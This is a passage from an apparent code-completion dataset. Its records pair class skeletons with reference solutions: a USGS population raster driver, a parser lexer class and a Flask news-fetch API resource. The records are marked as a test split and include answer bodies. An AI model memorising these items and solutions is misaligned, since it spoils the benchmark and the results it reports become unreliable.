If None, the full raster is loaded in memory.", "name": "LoadRaster", "signature": "def LoadRaster(self, box=None)"}, {"docstring": "Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).", "name": "GetPopulationDensity", "signature": "def GetPopulationDensity(self, latitudes, longitudes)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006272", "prompt": "Implement the Python class `UsgsPopDriver` described below.\n\nClass description:\nUSGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\n\nMethod signatures and docstrings:\n- def __init__(self, pop_directory=None, lazy_load=False): Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\n- def LoadRaster(self, box=None): Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\n- def GetPopulationDensity(self, latitudes, longitudes): Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).", "prompted_full_text": "Implement the Python class `UsgsPopDriver` described below.\n\nClass description:\nUSGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\n\nMethod signatures and docstrings:\n- def __init__(self, pop_directory=None, lazy_load=False): Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\n- def LoadRaster(self, box=None): Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\n- def GetPopulationDensity(self, latitudes, longitudes): Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\n\n<|skeleton|>\nclass UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n <|body_0|>\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\"\"\"\n <|body_1|>\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. 
Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n<|end_body_0|>\n\n<|body_start_1|>\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n<|end_body_1|>\n\n<|body_start_2|>\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n<|end_body_2|>\n", "revision_id": "19f2ae9c1a1844e2f2ca2ceddd07f392249741e6", "skeleton": "<|skeleton|>\nclass UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. 
lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n <|body_0|>\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\"\"\"\n <|body_1|>\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. 
If None, the full raster is loaded in memory.\"\"\"\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n", "source": "the_stack_v2_python_sparse", "source_path": "src/lib/usgs_pop/usgs_pop_driver.py", "source_repo": "Wireless-Innovation-Forum/Spectrum-Access-System", "split": "test", "star_events_count": 64} {"blob_id": "807adff37fd9c036da645c3db7a1ba8df2a2ea0d", "bodies": ["super(Lexer, self).__init__(TOKENS, TokenNamespace)\nif t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\nif s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\nself._arg(matcher=matcher)\nself._arg(tokens=tokens)\nself._arg(alphabet=alphabet)\nself._arg(discard=discard)\nself._karg(t_regexp=t_regexp)\nself._karg(s_regexp=s_regexp)\nself._karg(source=source)", "for token in self.tokens:\n if token.id_ == id_:\n return token", "if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\nelse:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = 
lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\ngenerator = self.matcher._match(tokens)\nwhile True:\n result, stream_out = (yield generator)\n yield (result, stream_out)"], "bodies_text": "<|body_start_0|>\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n<|end_body_0|>\n\n<|body_start_1|>\n for token in self.tokens:\n if token.id_ == id_:\n return token\n<|end_body_1|>\n\n<|body_start_2|>\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n<|end_body_2|>\n", "class_docstring": "This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.", "class_name": "Lexer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n <|body_0|>\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. 
Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n <|body_1|>\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n<|end_body_0|>\n\n<|body_start_1|>\n for token in self.tokens:\n if token.id_ == id_:\n return token\n<|end_body_1|>\n\n<|body_start_2|>\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000136", "length_bytes": 15248, "license_type": "permissive", "methods": [{"docstring": "matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.", "name": "__init__", "signature": "def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None)"}, {"docstring": "A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).", "name": "token_for_id", "signature": "def token_for_id(self, id_)"}, {"docstring": "Implement matching - pass token stream to tokens.", "name": "_match", "signature": "def _match(self, stream)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005933", "prompt": "Implement the Python class `Lexer` described below.\n\nClass description:\nThis takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\n\nMethod signatures and docstrings:\n- def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None): matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. 
discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\n- def token_for_id(self, id_): A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\n- def _match(self, stream): Implement matching - pass token stream to tokens.", "prompted_full_text": "Implement the Python class `Lexer` described below.\n\nClass description:\nThis takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\n\nMethod signatures and docstrings:\n- def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None): matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\n- def token_for_id(self, id_): A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\n- def _match(self, stream): Implement matching - pass token stream to tokens.\n\n<|skeleton|>\nclass Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n <|body_0|>\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. 
Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n <|body_1|>\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n<|end_body_0|>\n\n<|body_start_1|>\n for token in self.tokens:\n if token.id_ == id_:\n return token\n<|end_body_1|>\n\n<|body_start_2|>\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n<|end_body_2|>\n", "revision_id": "84386a0a82c8d657f8bb57aa0399fc251fa581c3", "skeleton": "<|skeleton|>\nclass Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n <|body_0|>\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n <|body_1|>\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. 
It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n for token in self.tokens:\n if token.id_ == id_:\n return token\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n", "source": "the_stack_v2_python_sparse", "source_path": "lepl/lexer/matchers.py", "source_repo": "alexmac/ifdef-refactor", "split": "test", "star_events_count": 3} {"blob_id": "7d11ffbca1b56700327d9bf296d078a445458f85", "bodies": ["filter_parser = reqparse.RequestParser(bundle_errors=True)\nfilter_parser.add_argument('last_pk', type=int, default=0, location='args')\nfilter_parser.add_argument('limit_num', type=int, default=20, location='args')\nfilter_parser_args = filter_parser.parse_args()\ndata = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\nresult = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\nreturn jsonify(result)", "request_args = request_parser.parse_args()\nrequest_item_args = request_parser_item_post.parse_args(req=request_args)\nif not request_item_args:\n raise BadRequest('Bad request.')\nrequest_data = request_item_args\nresult = add_fetch_result(request_data)\nif result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\nelse:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)"], "bodies_text": "<|body_start_0|>\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, 
location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n<|end_body_0|>\n\n<|body_start_1|>\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n<|end_body_1|>\n", "class_docstring": "FetchResultListResource", "class_name": "FetchResultListResource", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"
本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n<|end_body_0|>\n\n<|body_start_1|>\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000137", "length_bytes": 11580, "license_type": "permissive", "methods": [{"docstring": "Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:", "name": "get", "signature": "def get(self)"}, {"docstring": "Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"
